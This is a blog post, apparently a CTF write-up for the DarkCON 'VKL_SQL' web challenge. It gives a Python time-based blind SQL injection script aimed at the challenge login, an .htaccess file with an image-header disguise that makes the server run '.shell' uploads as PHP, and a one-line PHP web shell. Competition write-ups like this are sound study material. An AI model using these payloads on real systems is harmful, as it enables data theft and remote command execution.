Profile

i love cat

as3617

DarkCON ctf web writeup - VKL_SQL

1. SQL injection
2. file upload -> rce

sql_exploit.py

import requests
import string
import time

url = 'http://vkl-sql.darkarmy.xyz/login.php'
table_name = ''
strings = 'abcdefghijklmnopqrstuvwxyzABCDEFGHJIJKLMNOPQRSTUVWXYZ1234567890{}'
for i in range(1,80):
    for j in strings:
        #data = {'username':'admin" and if(ascii(substr((select schema_name from information_schema.schemata limit 4,1),'+str(i)+',1))='+str(ord(j))+',sleep(2),0)#','password':'aa'}
        #data = {'username':'admin" and if(ascii(substr((select table_name from information_schema.tables where table_schema="darkcon" limit 0,1),'+str(i)+',1))='+str(ord(j))+',sleep(5),0)#','password':'aa'}
        #data = {'username':'admin" and if(ascii(substr((select column_name from information_schema.columns where table_name="user" limit 1,1),'+str(i)+',1))='+str(ord(j))+',sleep(2),0)#','password':'aa'}
        data = {'username':'admin" and if(ascii(substr((select username from user limit 0,1),'+str(i)+',1))='+str(ord(j))+',sleep(5),0)#','password':'aa'}
        starttime = time.time()
        res = requests.post(url,data=data)
        endtime = time.time()
        print(table_name+j)
        if endtime-starttime>2:
            print("find!")
            table_name += str(j)
            break
        else:
            continue

upload

  • .htaccess


#define width 1337
#define height 1337

AddType application/x-httpd-php .shell
php_value zend.multibyte 1
php_value zend.detect_unicode 1
php_value display_errors 1
  • a.shell
<?php system($_GET['cmd']);?>

#define width 1337
#define height 1337

'ctf writeup' 카테고리의 다른 글

zh3r0 CTF v2 Web writeup  (1) 2021.06.06
m0leCon 2021 Teaser Writeup  (0) 2021.05.18
DarkCON ctf web writeup - VKL_SQL  (0) 2021.02.21
justCTF 2020 Web writeup  (0) 2021.02.05
Layer7 CTF 2020 writeup  (0) 2020.11.15
SSTF CTF 2020 Web - Migration  (0) 2020.08.18